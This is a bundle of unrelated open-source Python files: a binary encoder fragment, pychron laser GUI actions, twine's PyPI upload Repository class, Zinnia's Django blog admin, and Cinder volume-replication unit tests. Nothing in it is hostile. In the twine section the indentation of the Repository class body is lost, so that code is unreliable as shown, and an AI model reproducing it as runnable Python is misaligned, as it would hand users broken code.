def encode_dict(value, stream):
    """Dicts: magic byte, alternating encoded key/value pairs, then \\x00."""
    stream.write(_magic_by_type['dict'])
    for key, val in value.items():
        encode(key, stream)
        encode(val, stream)
    stream.write('\x00')
def decode_dict(stream):
    """Read key/value pairs until the terminator raises StopDecoding."""
    result = {}
    while True:
        try:
            key = decode(stream)
            result[key] = decode(stream)
        except StopDecoding:
            break
    return result
def encode_list(value, stream):
    """Lists/tuples: magic byte, encoded items in order, then \\x00."""
    stream.write(_magic_by_type['list'])
    for item in value:
        encode(item, stream)
    stream.write('\x00')
def decode_list(stream):
    """Read items until the terminator raises StopDecoding."""
    result = []
    while True:
        try:
            result.append(decode(stream))
        except StopDecoding:
            break
    return result
# Wire the encode_<type>/decode_<type> functions into the dispatch tables
# by name, so adding a type only requires defining the pair above.
_locals = locals()
for _type_name in _magic_by_type.keys():
    _encode_by_type[_type_name] = _locals['encode_%s' % _type_name]
    _decode_by_type[_type_name] = _locals['decode_%s' % _type_name]
| |
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# from traits.api import HasTraits
# from traitsui.api import View, Item
from __future__ import absolute_import
from pyface.action.action import Action
from pyface.tasks.action.task_action import TaskAction
from pychron.envisage.view_util import open_view
from pychron.lasers.laser_managers.ilaser_manager import ILaserManager
from pychron.lasers.laser_managers.pychron_laser_manager import PychronLaserManager
from pychron.lasers.pattern.pattern_maker_view import PatternMakerView
class BaseLaserAction(Action):
    """Common lookup of the laser manager an action should operate on."""
    manager_name = None
    manager = None
    def _get_manager(self, event, app=None):
        # Prefer an explicitly supplied manager; otherwise resolve the
        # named ILaserManager service from the application.
        if self.manager is not None:
            return self.manager
        if app is None:
            app = event.task.window.application
        return app.get_service(ILaserManager,
                               'name=="{}"'.format(self.manager_name))
class LocalLaserAction(BaseLaserAction):
    """Laser action bound to a concrete manager instance at construction."""
    client_action = False
    def __init__(self, manager, *args, **kw):
        super(LocalLaserAction, self).__init__(*args, **kw)
        # Disable non-client actions when the manager is a remote
        # (PychronLaserManager) instance.
        if isinstance(manager, PychronLaserManager) and not self.client_action:
            self.enabled = False
        self.manager = manager
# class ExecutePatternAction(LocalLaserAction):
# name = 'Execute Pattern'
#
# def perform(self, event):
# manager = self._get_manager(event)
# if manager is not None:
# manager.execute_pattern()
#
# class ExecuteAndLasePatternAction(LocalLaserAction):
# name = 'Execute Pattern and Lase'
#
# def perform(self, event):
# manager = self._get_manager(event)
# if manager is not None:
# manager.execute_pattern(lase=True)
class OpenScannerAction(LocalLaserAction):
    name = 'Open Scanner...'
    accelerator = 'Ctrl+T'
    def perform(self, event):
        """Open the scanner window on the resolved manager, if any."""
        manager = self._get_manager(event)
        if manager is None:
            return
        manager.open_scanner()
class OpenAutoTunerAction(LocalLaserAction):
    name = 'Open AutoTuner...'
    def perform(self, event):
        """Open the auto-tuner window on the resolved manager, if any."""
        manager = self._get_manager(event)
        if manager is None:
            return
        manager.open_autotuner()
class LaserTaskAction(TaskAction):
    # TaskAction variant that remains enabled while one of the fusions laser
    # tasks is active, caching that state in _enabled so _enabled_update can
    # restore it when no enabled_name trait is driving enablement.
    # def perform(self, event=None):
    #     app = self.task.window.application
    #     method = self._get_attr(self.object, self.method)
    #     if method:
    #         method()
    #     else:
    #         for i in ('pychron.fusions.co2', 'pychron.fusions.diode'):
    #             task = app.get_task(i, activate=False)
    #             method = self._get_attr(task, self.method)
    #             if method:
    #                 method()
    #                 break
    # Cached enabled-state computed in _task_changed; None until a laser
    # task has been seen.
    _enabled = None
    def _task_changed(self):
        # Recompute the cached enabled state whenever the active task changes;
        # only the CO2/diode fusions tasks can enable this action.
        if self.task:
            if self.task.id in ('pychron.fusions.co2',
                                'pychron.fusions.diode'):
                enabled = True
                if self.enabled_name:
                    if self.object:
                        enabled = bool(self._get_attr(self.object,
                                                      self.enabled_name, False))
                if enabled:
                    self._enabled = True
                else:
                    self._enabled = False
    def _enabled_update(self):
        """
        reimplement ListeningAction's _enabled_update
        """
        if self.enabled_name:
            if self.object:
                self.enabled = bool(self._get_attr(self.object,
                                                   self.enabled_name, False))
            else:
                self.enabled = False
        elif self._enabled is not None:
            self.enabled = self._enabled
        else:
            self.enabled = bool(self.object)
# class TestDegasAction(LaserTaskAction):
# name = 'Test Degas...'
# method = 'test_degas'
class OpenPatternAction(Action):
    name = 'Open Pattern...'
    def perform(self, event=None):
        """Load an existing pattern into a PatternMakerView and show it."""
        maker = PatternMakerView()
        if maker.load_pattern():
            open_view(maker)
class NewPatternAction(Action):
    name = 'New Pattern...'
    # NOTE(review): 'method' looks like a leftover from a TaskAction-style
    # action; perform() below ignores it. Confirm before removing.
    method = 'new_pattern'
    def perform(self, event=None):
        # Open a fresh PatternMakerView for designing a new pattern.
        pm = PatternMakerView()
        open_view(pm)
class LaserCalibrationAction(Action):
    """Base for actions that target the laser-calibration task."""
    def _get_task(self, event):
        # Resolve (and activate) the calibration task from the application.
        app = event.task.window.application
        return app.get_task('pychron.laser.calibration')
class PowerMapAction(LaserCalibrationAction):
    name = 'New Power Map...'
    def perform(self, event):
        """Start a new power map in the calibration task."""
        self._get_task(event).new_power_map()
class OpenPowerMapAction(LaserCalibrationAction):
    """Open previously saved power maps in the laser-calibration task."""
    name = 'Open Power Map'
    accelerator = 'Ctrl+3'

    def perform(self, event):
        app = event.task.window.application
        task_id = 'pychron.laser.calibration'
        # Don't activate yet; only raise/open the window if there are maps.
        task = app.get_task(task_id, activate=False)
        ps = task.get_power_maps()
        if ps:
            # Bug fix: Qt's visibility accessor is isVisible(), not
            # isvisible(); the old spelling raised AttributeError so the
            # window was never raised.
            if task.window.control.isVisible():
                task.window.control.raise_()
            else:
                task.window.open()
            task.open_power_maps(ps)
class PowerCalibrationAction(LaserCalibrationAction):
    name = 'Power Calibration...'
    def perform(self, event):
        """Start a new power calibration in the calibration task."""
        self._get_task(event).new_power_calibration()
class PyrometerCalibrationAction(LaserCalibrationAction):
    name = 'Pyrometer Calibration'
    def perform(self, event):
        """Start a new pyrometer calibration in the calibration task."""
        self._get_task(event).new_pyrometer_calibration()
class PIDTuningAction(LaserCalibrationAction):
    name = 'PID Tuning'
    def perform(self, event):
        """Start a new PID tuning session in the calibration task."""
        self._get_task(event).new_pid_tuner()
class LaserScriptExecuteAction(TaskAction):
    # Delegates to the active task's show_laser_script_executor method.
    method = 'show_laser_script_executor'
    name = 'Laser Script...'
# ============= EOF =============================================
| |
# Copyright 2015 Ian Cordasco
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import sys
from typing import Any, Dict, List, Optional, Set, Tuple, cast
import requests
import requests_toolbelt
import tqdm
import urllib3
from requests import adapters
from requests_toolbelt.utils import user_agent
import twine
from twine import package as package_file
# Form fields that must not be flattened into repeated (key, item) tuples.
KEYWORDS_TO_NOT_FLATTEN = {"gpg_signature", "content"}
# Known index URLs, used below to special-case PyPI/Warehouse behavior.
LEGACY_PYPI = "https://pypi.python.org/"
LEGACY_TEST_PYPI = "https://testpypi.python.org/"
WAREHOUSE = "https://upload.pypi.org/"
OLD_WAREHOUSE = "https://upload.pypi.io/"
TEST_WAREHOUSE = "https://test.pypi.org/"
WAREHOUSE_WEB = "https://pypi.org/"
logger = logging.getLogger(__name__)
class ProgressBar(tqdm.tqdm):
    def update_to(self, n: int) -> None:
        """Set the bar's absolute position to ``n``.

        requests-toolbelt reports a running total of bytes read, whereas
        ``tqdm.update`` expects a delta, so convert before delegating.
        """
        delta = n - self.n
        self.update(delta)  # update() also advances self.n to n
class Repository:
def __init__(
self,
repository_url: str,
username: Optional[str],
password: Optional[str],
disable_progress_bar: bool = False,
) -> None:
self.url = repository_url
self.session = requests.session()
# requests.Session.auth should be Union[None, Tuple[str, str], ...]
# But username or password could be None
# See TODO for utils.RepositoryConfig
self.session.auth = (
(username or "", password or "") if username or password else None
)
logger.info(f"username: {username if username else '<empty>'}")
logger.info(f"password: <{'hidden' if password else 'empty'}>")
self.session.headers["User-Agent"] = self._make_user_agent_string()
for scheme in ("http://", "https://"):
self.session.mount(scheme, self._make_adapter_with_retries())
# Working around https://github.com/python/typing/issues/182
self._releases_json_data: Dict[str, Dict[str, Any]] = {}
self.disable_progress_bar = disable_progress_bar
@staticmethod
def _make_adapter_with_retries() -> adapters.HTTPAdapter:
retry = urllib3.Retry(
allowed_methods=["GET"],
connect=5,
total=10,
status_forcelist=[500, 501, 502, 503],
)
return adapters.HTTPAdapter(max_retries=retry)
@staticmethod
def _make_user_agent_string() -> str:
from twine import cli
dependencies = cli.list_dependencies_and_versions()
user_agent_string = (
user_agent.UserAgentBuilder("twine", twine.__version__)
.include_extras(dependencies)
.include_implementation()
.build()
)
return cast(str, user_agent_string)
def close(self) -> None:
self.session.close()
@staticmethod
def _convert_data_to_list_of_tuples(data: Dict[str, Any]) -> List[Tuple[str, Any]]:
data_to_send = []
for key, value in data.items():
if key in KEYWORDS_TO_NOT_FLATTEN or not isinstance(value, (list, tuple)):
data_to_send.append((key, value))
else:
for item in value:
data_to_send.append((key, item))
return data_to_send
def set_certificate_authority(self, cacert: Optional[str]) -> None:
if cacert:
self.session.verify = cacert
def set_client_certificate(self, clientcert: Optional[str]) -> None:
if clientcert:
self.session.cert = clientcert
def register(self, package: package_file.PackageFile) -> requests.Response:
data = package.metadata_dictionary()
data.update({":action": "submit", "protocol_version": "1"})
print(f"Registering {package.basefilename}")
data_to_send = self._convert_data_to_list_of_tuples(data)
encoder = requests_toolbelt.MultipartEncoder(data_to_send)
resp = self.session.post(
self.url,
data=encoder,
allow_redirects=False,
headers={"Content-Type": encoder.content_type},
)
# Bug 28. Try to silence a ResourceWarning by releasing the socket.
resp.close()
return resp
def _upload(self, package: package_file.PackageFile) -> requests.Response:
data = package.metadata_dictionary()
data.update(
{
# action
":action": "file_upload",
"protocol_version": "1",
}
)
data_to_send = self._convert_data_to_list_of_tuples(data)
print(f"Uploading {package.basefilename}")
with open(package.filename, "rb") as fp:
data_to_send.append(
("content", (package.basefilename, fp, "application/octet-stream"))
)
encoder = requests_toolbelt.MultipartEncoder(data_to_send)
with ProgressBar(
total=encoder.len,
unit="B",
unit_scale=True,
unit_divisor=1024,
miniters=1,
file=sys.stdout,
disable=self.disable_progress_bar,
) as bar:
monitor = requests_toolbelt.MultipartEncoderMonitor(
encoder, lambda monitor: bar.update_to(monitor.bytes_read)
)
resp = self.session.post(
self.url,
data=monitor,
allow_redirects=False,
headers={"Content-Type": monitor.content_type},
)
return resp
def upload(
self, package: package_file.PackageFile, max_redirects: int = 5
) -> requests.Response:
number_of_redirects = 0
while number_of_redirects < max_redirects:
resp = self._upload(package)
if resp.status_code == requests.codes.OK:
return resp
if 500 <= resp.status_code < 600:
number_of_redirects += 1
print(
'Received "{status_code}: {reason}" Package upload '
"appears to have failed. Retry {retry} of "
"{max_redirects}".format(
status_code=resp.status_code,
reason=resp.reason,
retry=number_of_redirects,
max_redirects=max_redirects,
)
)
else:
return resp
return resp
def package_is_uploaded(
self, package: package_file.PackageFile, bypass_cache: bool = False
) -> bool:
# NOTE(sigmavirus24): Not all indices are PyPI and pypi.io doesn't
# have a similar interface for finding the package versions.
if not self.url.startswith((LEGACY_PYPI, WAREHOUSE, OLD_WAREHOUSE)):
return False
safe_name = package.safe_name
releases = None
if not bypass_cache:
releases = self._releases_json_data.get(safe_name)
if releases is None:
url = "{url}pypi/{package}/json".format(package=safe_name, url=LEGACY_PYPI)
headers = {"Accept": "application/json"}
response = self.session.get(url, headers=headers)
if response.status_code == 200:
releases = response.json()["releases"]
else:
releases = {}
self._releases_json_data[safe_name] = releases
packages = releases.get(package.metadata.version, [])
for uploaded_package in packages:
if uploaded_package["filename"] == package.basefilename:
return True
return False
def release_urls(self, packages: List[package_file.PackageFile]) -> Set[str]:
if self.url.startswith(WAREHOUSE):
url = WAREHOUSE_WEB
elif self.url.startswith(TEST_WAREHOUSE):
url = TEST_WAREHOUSE
else:
return set()
return {
"{}project/{}/{}/".format(url, package.safe_name, package.metadata.version)
for package in packages
}
    def verify_package_integrity(self, package: package_file.PackageFile) -> None:
        """Placeholder: verify the uploaded file matches the local one.

        Currently an intentional no-op.
        """
        # TODO(sigmavirus24): Add a way for users to download the package and
        # check it's hash against what it has locally.
        pass
| |
"""EntryAdmin for Zinnia"""
from django.contrib import admin
from django.db.models import Q
from django.utils import timezone
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.core.urlresolvers import NoReverseMatch
from django.utils.translation import ungettext_lazy
from django.utils.translation import ugettext_lazy as _
from zinnia import settings
from zinnia.managers import HIDDEN
from zinnia.managers import PUBLISHED
from zinnia.models.author import Author
from zinnia.ping import DirectoryPinger
from zinnia.admin.forms import EntryAdminForm
from zinnia.admin.filters import AuthorListFilter
from zinnia.admin.filters import CategoryListFilter
from zinnia.comparison import EntryPublishedVectorBuilder
class EntryAdmin(admin.ModelAdmin):
    """
    Admin for Entry model.

    Provides HTML-linked list columns (authors, categories, tags, sites),
    permission-aware querysets/readonly-fields/actions, and bulk actions
    for publication status, discussion toggles and directory pings.
    """
    form = EntryAdminForm
    date_hierarchy = 'creation_date'
    fieldsets = (
        (_('Content'), {
            'fields': (('title', 'status'), 'lead', 'content',)}),
        (_('Illustration'), {
            'fields': ('image', 'image_caption'),
            'classes': ('collapse', 'collapse-closed')}),
        (_('Publication'), {
            'fields': (('start_publication', 'end_publication'),
                       'creation_date', 'sites'),
            'classes': ('collapse', 'collapse-closed')}),
        (_('Discussions'), {
            'fields': ('comment_enabled', 'pingback_enabled',
                       'trackback_enabled'),
            'classes': ('collapse', 'collapse-closed')}),
        (_('Privacy'), {
            'fields': ('login_required', 'password'),
            'classes': ('collapse', 'collapse-closed')}),
        (_('Templates'), {
            'fields': ('content_template', 'detail_template'),
            'classes': ('collapse', 'collapse-closed')}),
        (_('Metadatas'), {
            'fields': ('featured', 'excerpt', 'authors', 'related'),
            'classes': ('collapse', 'collapse-closed')}),
        (None, {'fields': ('categories', 'tags', 'slug')}))
    list_filter = (CategoryListFilter, AuthorListFilter, 'status', 'featured',
                   'login_required', 'comment_enabled', 'pingback_enabled',
                   'trackback_enabled', 'creation_date', 'start_publication',
                   'end_publication', 'sites')
    list_display = ('get_title', 'get_authors', 'get_categories',
                    'get_tags', 'get_sites', 'get_is_visible', 'featured',
                    'get_short_url', 'creation_date')
    radio_fields = {'content_template': admin.VERTICAL,
                    'detail_template': admin.VERTICAL}
    filter_horizontal = ('categories', 'authors', 'related')
    prepopulated_fields = {'slug': ('title', )}
    search_fields = ('title', 'excerpt', 'content', 'tags')
    actions = ['make_mine', 'make_published', 'make_hidden',
               'close_comments', 'close_pingbacks', 'close_trackbacks',
               'ping_directories', 'put_on_top',
               'mark_featured', 'unmark_featured']
    actions_on_top = True
    actions_on_bottom = True
    def __init__(self, model, admin_site):
        # NOTE(review): this assigns onto the form *class* (shared by every
        # admin using EntryAdminForm), not this instance -- presumably the
        # form needs the admin site to build its widgets; confirm.
        self.form.admin_site = admin_site
        super(EntryAdmin, self).__init__(model, admin_site)
    # Custom Display
    def get_title(self, entry):
        """
        Return the title with word count and number of comments.
        """
        title = _('%(title)s (%(word_count)i words)') % \
            {'title': entry.title, 'word_count': entry.word_count}
        reaction_count = int(entry.comment_count +
                             entry.pingback_count +
                             entry.trackback_count)
        if reaction_count:
            return ungettext_lazy(
                '%(title)s (%(reactions)i reaction)',
                '%(title)s (%(reactions)i reactions)', reaction_count) % \
                {'title': title,
                 'reactions': reaction_count}
        return title
    get_title.short_description = _('title')
    def get_authors(self, entry):
        """
        Return the authors in HTML.

        Falls back to plain usernames when author URLs cannot be reversed.
        """
        try:
            authors = ['<a href="%s" target="blank">%s</a>' %
                       (author.get_absolute_url(),
                        getattr(author, author.USERNAME_FIELD))
                       for author in entry.authors.all()]
        except NoReverseMatch:
            authors = [getattr(author, author.USERNAME_FIELD)
                       for author in entry.authors.all()]
        return ', '.join(authors)
    get_authors.allow_tags = True
    get_authors.short_description = _('author(s)')
    def get_categories(self, entry):
        """
        Return the categories linked in HTML.
        """
        try:
            categories = ['<a href="%s" target="blank">%s</a>' %
                          (category.get_absolute_url(), category.title)
                          for category in entry.categories.all()]
        except NoReverseMatch:
            categories = [category.title for category in
                          entry.categories.all()]
        return ', '.join(categories)
    get_categories.allow_tags = True
    get_categories.short_description = _('category(s)')
    def get_tags(self, entry):
        """
        Return the tags linked in HTML.
        """
        try:
            return ', '.join(['<a href="%s" target="blank">%s</a>' %
                              (reverse('zinnia:tag_detail', args=[tag]), tag)
                              for tag in entry.tags_list])
        except NoReverseMatch:
            return entry.tags
    get_tags.allow_tags = True
    get_tags.short_description = _('tag(s)')
    def get_sites(self, entry):
        """
        Return the sites linked in HTML.
        """
        try:
            index_url = reverse('zinnia:entry_archive_index')
        except NoReverseMatch:
            index_url = ''
        return ', '.join(
            ['<a href="%s://%s%s" target="blank">%s</a>' %
             (settings.PROTOCOL, site.domain, index_url, site.name)
             for site in entry.sites.all()])
    get_sites.allow_tags = True
    get_sites.short_description = _('site(s)')
    def get_short_url(self, entry):
        """
        Return the short url in HTML.
        """
        try:
            short_url = entry.short_url
        except NoReverseMatch:
            short_url = entry.get_absolute_url()
        return '<a href="%(url)s" target="blank">%(url)s</a>' % \
               {'url': short_url}
    get_short_url.allow_tags = True
    get_short_url.short_description = _('short url')
    def get_is_visible(self, entry):
        """
        Admin wrapper for entry.is_visible.
        """
        return entry.is_visible
    get_is_visible.boolean = True
    get_is_visible.short_description = _('is visible')
    # Custom Methods
    def get_queryset(self, request):
        """
        Make special filtering by user's permissions.

        Users without 'zinnia.can_view_all' only see their own entries.
        """
        if not request.user.has_perm('zinnia.can_view_all'):
            queryset = self.model.objects.filter(authors__pk=request.user.pk)
        else:
            queryset = super(EntryAdmin, self).get_queryset(request)
        return queryset.prefetch_related('categories', 'authors', 'sites')
    def get_changeform_initial_data(self, request):
        """
        Provide initial datas when creating an entry.
        """
        get_data = super(EntryAdmin, self).get_changeform_initial_data(request)
        # Default to the current site and the requesting user only when
        # Django did not already supply initial data.
        return get_data or {
            'sites': [Site.objects.get_current().pk],
            'authors': [request.user.pk]
        }
    def formfield_for_manytomany(self, db_field, request, **kwargs):
        """
        Filter the disposable authors.
        """
        if db_field.name == 'authors':
            # Offer staff members plus anyone who already wrote an entry.
            kwargs['queryset'] = Author.objects.filter(
                Q(is_staff=True) | Q(entries__isnull=False)
            ).distinct()
        return super(EntryAdmin, self).formfield_for_manytomany(
            db_field, request, **kwargs)
    def get_readonly_fields(self, request, obj=None):
        """
        Return readonly fields by user's permissions.
        """
        readonly_fields = list(super(EntryAdmin, self).get_readonly_fields(
            request, obj))
        if not request.user.has_perm('zinnia.can_change_status'):
            readonly_fields.append('status')
        if not request.user.has_perm('zinnia.can_change_author'):
            readonly_fields.append('authors')
        return readonly_fields
    def get_actions(self, request):
        """
        Define actions by user's permissions.
        """
        actions = super(EntryAdmin, self).get_actions(request)
        if not actions:
            return actions
        if (not request.user.has_perm('zinnia.can_change_author') or
                not request.user.has_perm('zinnia.can_view_all')):
            del actions['make_mine']
        if not request.user.has_perm('zinnia.can_change_status'):
            del actions['make_hidden']
            del actions['make_published']
        if not settings.PING_DIRECTORIES:
            del actions['ping_directories']
        return actions
    # Custom Actions
    def make_mine(self, request, queryset):
        """
        Set the entries to the current user.
        """
        author = Author.objects.get(pk=request.user.pk)
        for entry in queryset:
            if author not in entry.authors.all():
                entry.authors.add(author)
        self.message_user(
            request, _('The selected entries now belong to you.'))
    make_mine.short_description = _('Set the entries to the user')
    def make_published(self, request, queryset):
        """
        Set entries selected as published.
        """
        queryset.update(status=PUBLISHED)
        # The set of published entries changed: flush the comparison cache
        # and notify the configured ping directories.
        EntryPublishedVectorBuilder().cache_flush()
        self.ping_directories(request, queryset, messages=False)
        self.message_user(
            request, _('The selected entries are now marked as published.'))
    make_published.short_description = _('Set entries selected as published')
    def make_hidden(self, request, queryset):
        """
        Set entries selected as hidden.
        """
        queryset.update(status=HIDDEN)
        EntryPublishedVectorBuilder().cache_flush()
        self.message_user(
            request, _('The selected entries are now marked as hidden.'))
    make_hidden.short_description = _('Set entries selected as hidden')
    def close_comments(self, request, queryset):
        """
        Close the comments for selected entries.
        """
        queryset.update(comment_enabled=False)
        self.message_user(
            request, _('Comments are now closed for selected entries.'))
    close_comments.short_description = _('Close the comments for '
                                         'selected entries')
    def close_pingbacks(self, request, queryset):
        """
        Close the pingbacks for selected entries.
        """
        queryset.update(pingback_enabled=False)
        self.message_user(
            request, _('Pingbacks are now closed for selected entries.'))
    close_pingbacks.short_description = _(
        'Close the pingbacks for selected entries')
    def close_trackbacks(self, request, queryset):
        """
        Close the trackbacks for selected entries.
        """
        queryset.update(trackback_enabled=False)
        self.message_user(
            request, _('Trackbacks are now closed for selected entries.'))
    close_trackbacks.short_description = _(
        'Close the trackbacks for selected entries')
    def put_on_top(self, request, queryset):
        """
        Put the selected entries on top at the current date.
        """
        queryset.update(creation_date=timezone.now())
        self.ping_directories(request, queryset, messages=False)
        self.message_user(request, _(
            'The selected entries are now set at the current date.'))
    put_on_top.short_description = _(
        'Put the selected entries on top at the current date')
    def mark_featured(self, request, queryset):
        """
        Mark selected as featured post.
        """
        queryset.update(featured=True)
        self.message_user(
            request, _('Selected entries are now marked as featured.'))
    mark_featured.short_description = _('Mark selected entries as featured')
    def unmark_featured(self, request, queryset):
        """
        Un-Mark selected featured posts.
        """
        queryset.update(featured=False)
        self.message_user(
            request, _('Selected entries are no longer marked as featured.'))
    unmark_featured.short_description = _(
        'Unmark selected entries as featured')
    def ping_directories(self, request, queryset, messages=True):
        """
        Ping web directories for selected entries.
        """
        for directory in settings.PING_DIRECTORIES:
            pinger = DirectoryPinger(directory, queryset)
            pinger.join()
            if messages:
                success = 0
                for result in pinger.results:
                    # NOTE(review): a missing 'flerror' key is counted as a
                    # failure (default True) -- presumably deliberate, since
                    # XML-RPC ping replies should always include it; confirm.
                    if not result.get('flerror', True):
                        success += 1
                    else:
                        self.message_user(request,
                                          '%s : %s' % (directory,
                                                       result['message']))
                if success:
                    self.message_user(
                        request,
                        _('%(directory)s directory succesfully '
                          'pinged %(success)d entries.') %
                        {'directory': directory, 'success': success})
    ping_directories.short_description = _(
        'Ping Directories for selected entries')
| |
# Copyright (c) 2016 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import ddt
import mock
from oslo_config import cfg
from oslo_utils import timeutils
from cinder.common import constants
from cinder import exception
from cinder import objects
from cinder.objects import fields
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_service
from cinder.tests.unit import utils
from cinder.tests.unit import volume as base
import cinder.volume
from cinder.volume import manager
from cinder.volume import rpcapi as volume_rpcapi
from cinder.volume import utils as vol_utils
# Module-level handle on the global oslo.config registry.
CONF = cfg.CONF
@ddt.ddt
class ReplicationTestCase(base.BaseVolumeTestCase):
def setUp(self):
super(ReplicationTestCase, self).setUp()
self.host = 'host@backend#pool'
self.manager = manager.VolumeManager(host=self.host)
    @mock.patch('cinder.objects.VolumeList.get_all')
    @mock.patch('cinder.volume.driver.BaseVD.failover_host',
                side_effect=exception.InvalidReplicationTarget(''))
    @ddt.data(('backend2', 'default', fields.ReplicationStatus.FAILED_OVER),
              ('backend2', 'backend3', fields.ReplicationStatus.FAILED_OVER),
              (None, 'backend2', fields.ReplicationStatus.ENABLED),
              ('', 'backend2', fields.ReplicationStatus.ENABLED))
    @ddt.unpack
    def test_failover_host_invalid_target(self, svc_backend, new_backend,
                                          expected, mock_failover,
                                          mock_getall):
        """Test replication failover_host with invalid_target.

        When failing over fails due to an invalid target exception we
        return replication_status to its previous status, and we decide
        what that is depending on the current active backend.
        """
        svc = utils.create_service(
            self.context,
            {'host': self.host,
             'binary': constants.VOLUME_BINARY,
             'active_backend_id': svc_backend,
             'replication_status': fields.ReplicationStatus.FAILING_OVER})
        self.manager.failover_host(self.context, new_backend)
        mock_getall.assert_called_once_with(self.context,
                                            filters={'host': self.host})
        mock_failover.assert_called_once_with(self.context,
                                              [],
                                              secondary_id=new_backend,
                                              groups=[])
        db_svc = objects.Service.get_by_id(self.context, svc.id)
        self.assertEqual(expected, db_svc.replication_status)
    @mock.patch('cinder.volume.driver.BaseVD.failover_host',
                mock.Mock(side_effect=exception.VolumeDriverException('')))
    def test_failover_host_driver_exception(self):
        """A driver error during failover leaves the service in FAILOVER_ERROR."""
        svc = utils.create_service(
            self.context,
            {'host': self.host,
             'binary': constants.VOLUME_BINARY,
             'active_backend_id': None,
             'replication_status': fields.ReplicationStatus.FAILING_OVER})
        self.manager.failover_host(self.context, mock.sentinel.backend_id)
        db_svc = objects.Service.get_by_id(self.context, svc.id)
        self.assertEqual(fields.ReplicationStatus.FAILOVER_ERROR,
                         db_svc.replication_status)
    # Patching is_up with a plain value (True) replaces the attribute and
    # therefore does not inject an extra mock argument into the signature.
    @mock.patch('cinder.objects.Service.is_up', True)
    @mock.patch.object(volume_rpcapi.VolumeAPI, 'failover')
    @mock.patch.object(cinder.db, 'conditional_update')
    @mock.patch.object(objects.ServiceList, 'get_all')
    def test_failover(self, mock_get_all, mock_db_update, mock_failover):
        """Test replication failover."""
        service = fake_service.fake_service_obj(self.context,
                                                binary='cinder-volume')
        mock_get_all.return_value = [service]
        mock_db_update.return_value = {'replication_status': 'enabled'}
        volume_api = cinder.volume.api.API()
        volume_api.failover(self.context, host=CONF.host, cluster_name=None)
        mock_failover.assert_called_once_with(self.context, service, None)
    @mock.patch.object(volume_rpcapi.VolumeAPI, 'failover')
    @mock.patch.object(cinder.db, 'conditional_update')
    @mock.patch.object(cinder.db, 'service_get_all')
    def test_failover_unexpected_status(self, mock_db_get_all, mock_db_update,
                                        mock_failover):
        """Test replication failover unexpected status."""
        mock_db_get_all.return_value = [fake_service.fake_service_obj(
            self.context,
            binary='cinder-volume')]
        # A None from conditional_update presumably means no row matched the
        # expected status; the API then raises InvalidInput.
        mock_db_update.return_value = None
        volume_api = cinder.volume.api.API()
        self.assertRaises(exception.InvalidInput,
                          volume_api.failover,
                          self.context,
                          host=CONF.host,
                          cluster_name=None)
    @mock.patch.object(volume_rpcapi.VolumeAPI, 'freeze_host')
    @mock.patch.object(cinder.db, 'conditional_update', return_value=1)
    @mock.patch.object(cinder.objects.ServiceList, 'get_all')
    def test_freeze_host(self, mock_get_all, mock_db_update,
                         mock_freeze):
        """Test replication freeze_host."""
        service = fake_service.fake_service_obj(self.context,
                                                binary='cinder-volume')
        mock_get_all.return_value = [service]
        mock_freeze.return_value = True
        volume_api = cinder.volume.api.API()
        volume_api.freeze_host(self.context, host=CONF.host, cluster_name=None)
        # The RPC layer must be asked to freeze exactly the service we found.
        mock_freeze.assert_called_once_with(self.context, service)
    @mock.patch.object(volume_rpcapi.VolumeAPI, 'freeze_host')
    @mock.patch.object(cinder.db, 'conditional_update')
    @mock.patch.object(cinder.db, 'service_get_all')
    def test_freeze_host_unexpected_status(self, mock_get_all,
                                           mock_db_update,
                                           mock_freeze):
        """Test replication freeze_host unexpected status."""
        mock_get_all.return_value = [fake_service.fake_service_obj(
            self.context,
            binary='cinder-volume')]
        # None from conditional_update: the service could not be updated.
        mock_db_update.return_value = None
        volume_api = cinder.volume.api.API()
        self.assertRaises(exception.InvalidInput,
                          volume_api.freeze_host,
                          self.context,
                          host=CONF.host,
                          cluster_name=None)
    @mock.patch.object(volume_rpcapi.VolumeAPI, 'thaw_host')
    @mock.patch.object(cinder.db, 'conditional_update', return_value=1)
    @mock.patch.object(cinder.objects.ServiceList, 'get_all')
    def test_thaw_host(self, mock_get_all, mock_db_update,
                       mock_thaw):
        """Test replication thaw_host."""
        service = fake_service.fake_service_obj(self.context,
                                                binary='cinder-volume')
        mock_get_all.return_value = [service]
        mock_thaw.return_value = True
        volume_api = cinder.volume.api.API()
        volume_api.thaw_host(self.context, host=CONF.host, cluster_name=None)
        # The RPC layer must be asked to thaw exactly the service we found.
        mock_thaw.assert_called_once_with(self.context, service)
    @mock.patch.object(volume_rpcapi.VolumeAPI, 'thaw_host')
    @mock.patch.object(cinder.db, 'conditional_update')
    @mock.patch.object(cinder.db, 'service_get_all')
    def test_thaw_host_unexpected_status(self, mock_get_all,
                                         mock_db_update,
                                         mock_thaw):
        """Test replication thaw_host unexpected status."""
        mock_get_all.return_value = [fake_service.fake_service_obj(
            self.context,
            binary='cinder-volume')]
        # None from conditional_update: the service could not be updated.
        mock_db_update.return_value = None
        volume_api = cinder.volume.api.API()
        self.assertRaises(exception.InvalidInput,
                          volume_api.thaw_host,
                          self.context,
                          host=CONF.host, cluster_name=None)
